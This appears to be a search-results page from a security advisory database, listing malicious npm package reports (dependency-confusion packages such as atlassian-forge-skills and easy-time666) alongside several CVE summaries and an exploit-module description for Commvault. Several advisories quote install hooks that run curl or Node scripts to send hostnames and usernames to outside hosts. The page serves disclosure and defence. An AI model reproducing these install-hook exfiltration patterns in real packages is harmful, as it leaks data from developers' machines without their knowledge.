14 matches found
MAL-2026-5891 Malicious code in atlassian-forge-skills (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c Package impersonates an internal Atlassian Forge dependency unscoped name atlassian-forge-skills, description 'Internal package', generic author...
Malicious code in atlassian-forge-skills (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c Package impersonates an internal Atlassian Forge dependency unscoped name atlassian-forge-skills, description 'Internal package', generic author...
MAL-2026-5830 Malicious code in unico-check (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1945d7aee54e60800e30f150e6db8042fa3aee9ea99f6b5a4ab14e2a1c26571d package.json declares a preinstall lifecycle hook that runs curl against https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f, passing the...
Malicious code in easy-time666 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...
MAL-2026-5749 Malicious code in easy-time666 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...
MAL-2026-5521 Malicious code in @helpcentre/tesco-help (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector eb75510e87a08a5152331461c2b2b955ad21d418c8d2055f5f66ec15e22cf042 On npm install, the postinstall hook runs node index.js, which performs an HTTPS POST to https://f1ackavab3.execute-api.eu-west-2.amazonaws.com/...
MAL-2026-5417 Malicious code in @klapp-sca/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 495f510483f297a56d545e8555db20eb54569f904bfd71853e54a18d89812cb0 package.json declares "preinstall": "node index.js || true", so on every npm install the bundled index.js runs automatically and collects os.hostname...
MAL-2026-5435 Malicious code in ac_semantic-ui_ts (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f8b97f7d3e69494d0415e13aec8d9d51ce1f5912d8c1de45a1e563e2d1b01d3d package.json declares a postinstall hook that runs canary.js, which issues an HTTP GET to bare IP 157.230.17.236 on port 80 with query parameters...
Malicious code in @pelmnaads/naads-common-logger (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68990dfacdc750bf464d646aca4855c2dd23bbefcadef1d9638e2d663a23fc57 The package is published to the public npm registry under @pelmnaads/naads-common-logger with version 19999.0.1 — the canonical dependency-confusion...
CVE-2025-13995
IBM QRadar SIEM 7.5.0 through 7.5.0 Update Package 14 could allow an attacker with access to one tenant to access hostname data from another tenant's account...
curl 安全漏洞
curl is an open-source tool developed by cURL for transferring data from or to a server. Curl has a security vulnerability that arises from the use of OAuth2 bearer tokens for HTTPS transfers. In some cases, this vulnerability may lead to the token being leaked to another hostname...
Commvault Command-Line Argument Injection to Traversal Remote Code Execution
This module exploits an unauthenticated remote code execution exploit chain for Commvault, tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated access to the 'localadmin' account, which then facilitates code execution via expression language injection...
CVE-2022-22961
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an information disclosure vulnerability due to returning excess information. A malicious actor with remote access may leak the hostname of the target system. Successful exploitation of this issue can lead to targeting...
CVE-2022-22961
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an information disclosure vulnerability due to returning excess information. A malicious actor with remote access may leak the hostname of the target system. Successful exploitation of this issue can lead to targeting...